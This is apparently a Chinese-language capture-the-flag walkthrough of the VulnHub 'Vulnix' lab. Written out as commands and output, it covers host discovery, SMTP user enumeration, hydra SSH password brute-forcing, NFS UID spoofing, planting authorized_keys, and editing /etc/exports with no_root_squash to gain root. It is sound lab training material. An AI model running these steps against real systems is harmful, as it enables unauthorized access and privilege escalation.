0x01 环境
靶机地址:
https://www.vulnhub.com/entry/hacklab-vulnix,48/
0x02 过程
1.信息收集
┌──(root㉿kali)-[/home/kali/Desktop/tmp]
└─# netdiscover -r 192.168.60.1/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.60.188 00:0c:29:48:7b:e4 1 60 VMware, Inc.
找到IP:192.168.60.188
端口信息
┌──(root㉿kali)-[/home/kali/Desktop/tmp]
└─# nmap --min-rate 10000 -p- 192.168.60.188
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-11 04:37 EDT
Nmap scan report for vulnix (192.168.60.188)
Host is up (0.0020s latency).
Not shown: 65518 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
79/tcp open finger
110/tcp open pop3
111/tcp open rpcbind
143/tcp open imap
512/tcp open exec
513/tcp open login
514/tcp open shell
993/tcp open imaps
995/tcp open pop3s
2049/tcp open nfs
33049/tcp open unknown
35637/tcp open unknown
40287/tcp open unknown
40657/tcp open unknown
43592/tcp open unknown
MAC Address: 00:0C:29:48:7B:E4 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.15 seconds
2.思路
发现NFS开放
查看共享文件
┌──(root㉿kali)-[/home/kali/Desktop/tmp]
└─# showmount -e 192.168.60.188
Export list for 192.168.60.188:
/home/vulnix *
┌──(root㉿kali)-[/home/kali/Desktop/tmp]
└─# mkdir /tmp/mount
┌──(root㉿kali)-[/home/kali/Desktop/tmp]
└─# mount -t nfs 192.168.60.188:/home/vulnix /tmp/mount/
┌──(root㉿kali)-[/home/kali/Desktop/tmp]
└─# cd /tmp/mount
cd: permission denied: /tmp/mount
发现共享文件设置了权限,根据NFS特性,要找到相同的UID或GID用户才能访问该目录
发现25端口开放
枚举smtp用户
┌──(root㉿kali)-[/home/kali/Desktop/tmp]
└─# smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -t 192.168.60.188
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt
Target count ............. 1
Username count ........... 17
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Tue Apr 11 05:25:17 2023 #########
192.168.60.188: root exists
192.168.60.188: user exists
######## Scan completed at Tue Apr 11 05:25:18 2023 #########
2 results.
17 queries in 1 seconds (17.0 queries / sec)
爆破user用户
┌──(root㉿kali)-[/home/kali/Desktop/tmp]
└─# hydra -l user -P /usr/share/wordlists/rockyou.txt -t 4 -f 192.168.60.188 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-11 05:29:38
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://192.168.60.188:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344355 to do in 5433:29h, 4 active
[STATUS] 33.00 tries/min, 99 tries in 00:03h, 14344300 to do in 7244:36h, 4 active
[STATUS] 29.14 tries/min, 204 tries in 00:07h, 14344195 to do in 8203:23h, 4 active
[STATUS] 29.60 tries/min, 444 tries in 00:15h, 14343955 to do in 8076:34h, 4 active
[22][ssh] host: 192.168.60.188 login: user password: letmein
[STATUS] attack finished for 192.168.60.188 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-11 05:47:16
得到账户密码:
user:letmein
ssh登录
┌──(kali㉿kali)-[~]
└─$ ssh user@192.168.60.188
The authenticity of host '192.168.60.188 (192.168.60.188)' can't be established.
ECDSA key fingerprint is SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.188' (ECDSA) to the list of known hosts.
user@192.168.60.188's password:
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Tue Apr 11 11:02:41 BST 2023
System load: 0.0 Processes: 90
Usage of /: 90.6% of 773MB Users logged in: 0
Memory usage: 8% IP address for eth0: 192.168.60.188
Swap usage: 0%
=> / is using 90.6% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife
New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
user@vulnix:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
postfix:x:104:110::/var/spool/postfix:/bin/false
dovecot:x:105:112:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:106:65534:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:107:113::/var/lib/landscape:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
statd:x:109:65534::/var/lib/nfs:/bin/false
user@vulnix:~$
发现vulnix用户UID为2008,于是在kali上创建UID为2008的vulnix用户
由于靶机上的vulnix用户将自己主目录挂载了出来,所以只需要上传公钥,就可以进行私钥登录了。
┌──(root㉿kali)-[/home/kali]
└─# useradd -u 2008 vulnix
┌──(root㉿kali)-[/home/kali]
└─# su vulnix
$ bash
vulnix@kali:/home/kali$ cd /tmp/mount/
vulnix@kali:/tmp/mount$ ls -al
total 20
drwxr-x--- 2 vulnix vulnix 4096 Sep 2 2012 .
drwxrwxrwt 17 root root 4096 Apr 20 22:29 ..
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
vulnix@kali:/tmp/mount$ mkdir .ssh
vulnix@kali:/tmp/mount$ ls -al
total 24
drwxr-x--- 3 vulnix vulnix 4096 Apr 20 2023 .
drwxrwxrwt 17 root root 4096 Apr 20 22:29 ..
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
drwxr-xr-x 2 vulnix vulnix 4096 Apr 20 2023 .ssh
vulnix@kali:/tmp/mount$ exit
exit
$ exit
以上过程切换成vulnix用户,进入挂载的目录,创建.ssh文件夹
接下来生成私钥,并将公钥放入挂载目录的.ssh文件夹下
ssh-keygen
默认回车就好
接下来导入
┌──(root㉿kali)-[~]
└─# cat .ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIUQcZpz9WTBZuQZWSFpjsfPpu3eih6OZFWYa6ubn6/+5I7zn5flIMqkjhclfNqxg4Pw/+caiwDJPPgA0lKGioszghE5r19LFtq+q+ttG+QO5ELqD212QHzDz6EtH+kBGx7SX++vR505HB7p2JwTKi53Ti903B6I+51FRhrQA+qe1IoDoWbOrroXu+odryibqLnuzX/OGYgHhS4AbLtYKkfOO0p7dFQnd4xZFQLmqwPW+QG493/780pOMvb0E0Me5stwINfsAKPQhX2H2OKQBAeVLg/ipQjbeKFY9mdkHyutyDenmESd35frzVO8/agkd6ndo9DFJyWv4P0xnAOGOV1JzXws0FeTZpTT7SDZwdXSc2bNwti3EoM0UEEYcLC4w+QbvZkkYbEAEGLC0ZDEVnf6Ji4u8iHB2fisgu4XtncTkMJ+wOnfYUiYY1zosPN2ZnZRYC61U+TQufTBx+n8+y2U0yUEo6bwe86B6LrTrRSHyNB31bxZ82rXRK0XHvxQc= root@kali
┌──(root㉿kali)-[~]
└─# su vulnix
$ bash
vulnix@kali:/root$ cd /tmp/mount
vulnix@kali:/tmp/mount$ ls
vulnix@kali:/tmp/mount$ ls -al
total 24
drwxr-x--- 3 vulnix vulnix 4096 Apr 20 22:30 .
drwxrwxrwt 17 root root 4096 Apr 20 22:29 ..
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
drwxr-xr-x 2 vulnix vulnix 4096 Apr 20 22:30 .ssh
vulnix@kali:/tmp/mount$ cd .ssh
vulnix@kali:/tmp/mount/.ssh$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIUQcZpz9WTBZuQZWSFpjsfPpu3eih6OZFWYa6ubn6/+5I7zn5flIMqkjhclfNqxg4Pw/+caiwDJPPgA0lKGioszghE5r19LFtq+q+ttG+QO5ELqD212QHzDz6EtH+kBGx7SX++vR505HB7p2JwTKi53Ti903B6I+51FRhrQA+qe1IoDoWbOrroXu+odryibqLnuzX/OGYgHhS4AbLtYKkfOO0p7dFQnd4xZFQLmqwPW+QG493/780pOMvb0E0Me5stwINfsAKPQhX2H2OKQBAeVLg/ipQjbeKFY9mdkHyutyDenmESd35frzVO8/agkd6ndo9DFJyWv4P0xnAOGOV1JzXws0FeTZpTT7SDZwdXSc2bNwti3EoM0UEEYcLC4w+QbvZkkYbEAEGLC0ZDEVnf6Ji4u8iHB2fisgu4XtncTkMJ+wOnfYUiYY1zosPN2ZnZRYC61U+TQufTBx+n8+y2U0yUEo6bwe86B6LrTrRSHyNB31bxZ82rXRK0XHvxQc= root@kali' > authorized_keys
vulnix@kali:/tmp/mount/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIUQcZpz9WTBZuQZWSFpjsfPpu3eih6OZFWYa6ubn6/+5I7zn5flIMqkjhclfNqxg4Pw/+caiwDJPPgA0lKGioszghE5r19LFtq+q+ttG+QO5ELqD212QHzDz6EtH+kBGx7SX++vR505HB7p2JwTKi53Ti903B6I+51FRhrQA+qe1IoDoWbOrroXu+odryibqLnuzX/OGYgHhS4AbLtYKkfOO0p7dFQnd4xZFQLmqwPW+QG493/780pOMvb0E0Me5stwINfsAKPQhX2H2OKQBAeVLg/ipQjbeKFY9mdkHyutyDenmESd35frzVO8/agkd6ndo9DFJyWv4P0xnAOGOV1JzXws0FeTZpTT7SDZwdXSc2bNwti3EoM0UEEYcLC4w+QbvZkkYbEAEGLC0ZDEVnf6Ji4u8iHB2fisgu4XtncTkMJ+wOnfYUiYY1zosPN2ZnZRYC61U+TQufTBx+n8+y2U0yUEo6bwe86B6LrTrRSHyNB31bxZ82rXRK0XHvxQc= root@kali
vulnix@kali:/tmp/mount/.ssh$ ls
authorized_keys
vulnix@kali:/tmp/mount/.ssh$ ls -al
total 12
drwxr-xr-x 2 vulnix vulnix 4096 Apr 20 22:33 .
drwxr-x--- 3 vulnix vulnix 4096 Apr 20 22:30 ..
-rw-r--r-- 1 vulnix vulnix 563 Apr 20 22:33 authorized_keys
vulnix@kali:/tmp/mount/.ssh$ chmod 600 authorized_keys
vulnix@kali:/tmp/mount/.ssh$ cd ..
vulnix@kali:/tmp/mount$ chmod 700 .ssh/
vulnix@kali:/tmp/mount$ ls -al
total 24
drwxr-x--- 3 vulnix vulnix 4096 Apr 20 22:30 .
drwxrwxrwt 17 root root 4096 Apr 20 22:39 ..
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
drwx------ 2 vulnix vulnix 4096 Apr 20 22:33 .ssh
进行公钥登录,由于靶机上的ssh版本太低,2023kali上的ssh版本太新了,所以添加参数才能成功使用私钥登录
┌──(root㉿kali)-[~]
└─# ssh vulnix@192.168.60.188 -oPubkeyAcceptedKeyTypes=ssh-rsa
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Fri Apr 21 04:23:32 BST 2023
System load: 0.0 Processes: 89
Usage of /: 90.2% of 773MB Users logged in: 0
Memory usage: 7% IP address for eth0: 192.168.60.188
Swap usage: 0%
=> / is using 90.2% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife
New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Fri Apr 21 03:49:28 2023 from kali
vulnix@vulnix:~$
提权过程
发现可以操作/etc/exports文件
vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
vulnix@vulnix:~$ sudoedit /etc/exports
于是挂载/root目录
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree$
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)
/root *(no_root_squash,insecure,rw)
重启靶机
和上面一样挂载,然后写入公钥,再进行私钥连接
┌──(root㉿kali)-[~]
└─# showmount -e 192.168.60.188
Export list for 192.168.60.188:
/root *
/home/vulnix *
┌──(root㉿kali)-[~]
└─# mkdir /tmp/root
┌──(root㉿kali)-[~]
└─# mount -t nfs 192.168.60.188:/root /tmp/root
┌──(root㉿kali)-[~]
└─# cd /tmp/root
┌──(root㉿kali)-[/tmp/root]
└─# ls -al
total 28
drwx------ 3 root root 4096 Sep 2 2012 .
drwxrwxrwt 18 root root 4096 Apr 21 01:49 ..
-rw------- 1 root root 0 Sep 2 2012 .bash_history
-rw-r--r-- 1 root root 3106 Apr 19 2012 .bashrc
drwx------ 2 root root 4096 Sep 2 2012 .cache
-rw-r--r-- 1 root root 140 Apr 19 2012 .profile
-r-------- 1 root root 33 Sep 2 2012 trophy.txt
-rw------- 1 root root 710 Sep 2 2012 .viminfo
┌──(root㉿kali)-[/tmp/root]
└─# mkdir .ssh
┌──(root㉿kali)-[/tmp/root]
└─# cp ~/.ssh/id_rsa.pub /tmp/root/.ssh/authorized_keys
┌──(root㉿kali)-[/tmp/root]
└─# cat .ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIUQcZpz9WTBZuQZWSFpjsfPpu3eih6OZFWYa6ubn6/+5I7zn5flIMqkjhclfNqxg4Pw/+caiwDJPPgA0lKGioszghE5r19LFtq+q+ttG+QO5ELqD212QHzDz6EtH+kBGx7SX++vR505HB7p2JwTKi53Ti903B6I+51FRhrQA+qe1IoDoWbOrroXu+odryibqLnuzX/OGYgHhS4AbLtYKkfOO0p7dFQnd4xZFQLmqwPW+QG493/780pOMvb0E0Me5stwINfsAKPQhX2H2OKQBAeVLg/ipQjbeKFY9mdkHyutyDenmESd35frzVO8/agkd6ndo9DFJyWv4P0xnAOGOV1JzXws0FeTZpTT7SDZwdXSc2bNwti3EoM0UEEYcLC4w+QbvZkkYbEAEGLC0ZDEVnf6Ji4u8iHB2fisgu4XtncTkMJ+wOnfYUiYY1zosPN2ZnZRYC61U+TQufTBx+n8+y2U0yUEo6bwe86B6LrTrRSHyNB31bxZ82rXRK0XHvxQc= root@kali
┌──(root㉿kali)-[/tmp/root]
└─# ls -al .ssh
total 12
drwxr-xr-x 2 root root 4096 Apr 21 01:50 .
drwx------ 4 root root 4096 Apr 21 01:50 ..
-rw-r--r-- 1 root root 563 Apr 21 01:50 authorized_keys
┌──(root㉿kali)-[/tmp/root]
└─# chmod 600 .ssh/authorized_keys
┌──(root㉿kali)-[/tmp/root]
└─# ssh root@192.168.60.188 -oPubkeyAcceptedKeyTypes=ssh-rsa
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Fri Apr 21 06:51:13 BST 2023
System load: 0.0 Processes: 93
Usage of /: 84.5% of 773MB Users logged in: 0
Memory usage: 8% IP address for eth0: 192.168.60.188
Swap usage: 0%
Graph this data and manage this system at https://landscape.canonical.com/
Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife
New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
root@vulnix:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vulnix:~#
获得root权限